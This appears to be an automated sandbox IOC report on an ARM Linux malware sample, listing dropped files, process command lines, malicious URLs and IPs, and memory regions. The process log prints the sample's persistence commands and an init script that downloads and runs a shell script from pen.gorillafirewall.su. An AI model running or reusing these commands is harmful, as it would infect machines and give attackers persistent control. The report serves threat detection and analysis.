IOC Report
arm.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
arm.nn.elf
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
initial sample
malicious
/etc/init.d/arm.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.RPk48h (deleted)
ASCII text
dropped
/tmp/qemu-open.Z2reag (deleted)
data
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/arm.nn.elf
/tmp/arm.nn.elf
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/arm.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/arm.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/arm.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
/tmp/arm.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/arm.nn.elf
/tmp/arm.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/arm.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
/tmp/arm.nn.elf
-
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.npMgjmkGVj /tmp/tmp.ikGaQDK0rl /tmp/tmp.OeS2BRGJNg
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.npMgjmkGVj /tmp/tmp.ikGaQDK0rl /tmp/tmp.OeS2BRGJNg
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 28 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pen.gorillafirewall.su/
unknown

IPs

IP
Domain
Country
Malicious
154.216.17.220
unknown
Seychelles
malicious
91.92.246.113
unknown
Bulgaria
malicious
93.123.85.166
unknown
Bulgaria
malicious
54.171.230.55
unknown
United States
45.202.35.64
unknown
Seychelles
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f9dec02b000
page execute read
malicious
7fff40908000
page execute read
7f9ef4219000
page read and write
7f9ef3eb7000
page read and write
7f9ef44a7000
page read and write
7f9dec038000
page read and write
7f9ef4b68000
page read and write
7f9ef4aff000
page read and write
7fff408e6000
page read and write
5627953f0000
page read and write
7f9ef4613000
page read and write
7f9ef4484000
page read and write
5627917f2000
page read and write
7f9ef3e25000
page read and write
7f9dec034000
page read and write
562793807000
page read and write
7f9eec021000
page read and write
7f9ef47f5000
page read and write
7f9ef361d000
page read and write
5627917e9000
page read and write
7f9ef4b23000
page read and write
5627937f0000
page execute and read and write
7f9eebfff000
page read and write
562791598000
page execute read
7f9ef49d6000
page read and write
There are 15 hidden memdumps, click here to show them.